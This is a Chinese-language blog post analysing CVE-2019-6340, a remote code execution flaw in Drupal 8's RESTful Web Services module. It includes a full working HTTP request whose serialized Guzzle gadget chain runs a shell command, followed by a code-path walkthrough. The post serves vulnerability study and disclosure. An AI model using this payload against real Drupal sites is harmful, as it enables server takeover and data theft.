Drupal Core RESTful RCE (CVE-2019-6340)

2019-02-28 16,283

t01840d16637c0348bc_WPS图片.jpg


近日,Drupal官方更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启RESTful Web Services拓展模块的情况下,可能导致PHP代码执行的严重安全。

image-20190224222445382.png

漏洞条件

根据官方公告和自身实践,8.6.X(<8.6.10)两种情况可能导致问题出现:

  • RESTful Web Services 拓展开启,并且启用了REST resources(默认配置即可),不需要区分GET,POST等方法即可完成攻击。

  • JSON:API服务模块开启,此服务尚未分析。

攻击步骤

这里使用drupal-8.6.5作为测试版本,搭建REST服务进行漏洞分析


配置RESTful服务

在拓展中安装RESTful对应的WEB服务

image-20190224224642823.png

RESTful服务开启后,对于REST resources的设置比较麻烦,安装REST UI拓展进行图形化的管理,方便查看(不安装也是可以的)。

RESTful服务开启后,其中/node/{node}这个REST resources是默认配置中就启用的,可以通过REST UI查看,发现确实如此,默认配置即可被攻击者利用。

image-20190224225107777.png

攻击验证

发送包含whoami系统验证指令的攻击数据包

GET /drupal/node/1?_format=json HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/hal+json
Connection: close
Content-Length: 637
{
 "link": [
   {
     "value": "link",
     "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:6:\"whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
   }
 ],
 "_links": {
   "type": {
     "href": "http://127.0.0.1/drupal/rest/type/shortcut/default"
   }
 }
}

image-20190224230556625.png


漏洞分析

官方公告中(现已修正)一开始仅仅说开启POST/PATCH两种请求方式才会收到攻击,其实并不区分类型,上图就是GET请求的攻击,因为程序在进入在对请求进行deserialize的时候,是还是通过php://input进行获取请求内容。

image-20190224232428879.png

跟进$request->getContent

image-20190224232339576.png

获得请求内容后,使用$this->serializer->decode对请求内容进行解码并赋值$unserialized。

image-20190225113720396.png

然后传入$this->serializer->denormalize函数,Drupal 8的Serialization API是主要基于Symfony Serializer组件,具体可参加文档。

serializer_workflow.png

一路跟进直到getTypeInternalIds函数,检查url是否是网站已知的类型。

image-20190225115619309.png

继续跟进,真正的判断在这个位置,函数栈如下:

image.png


继续跟进,将结果变量$typed_data_ids['entity_type']传入getEntityTypeDefinition函数,取实体的定义类型。

image-20190225133117060.png

继续跟进,此时$context['target_instance']中包含Drupal\Core\Field\FieldItemList的实例。

image-20190225141824210.png

继续跟进,经过$items->appendItem()后,$context['target_instance']被重新赋值,此时包含Drupal\link\Plugin\Field\FieldType\LinkItem的实例。

image.png


继续跟进,将$context['target_instance']中的实例赋值给$field_item,然后调用$field_item->setValue方法,并传入了$data。

image-20190225142931886.png

data的值如下:

image-20190225143810000.png

继续跟进setValue函数,这里的$values['options']可控,找到反序列化漏洞的触发点。

image-20190225145134766.png

利用Drupal自带的Guzzle库,FnStream类的析构函数中包含call_user_func,进行利用链的构造。

image-20190225151230070.png


本文作者:Rai4over

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/99413.html

Tags:
评论  (0)
快来写下你的想法吧!

Rai4over

文章数:30 积分: 625

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号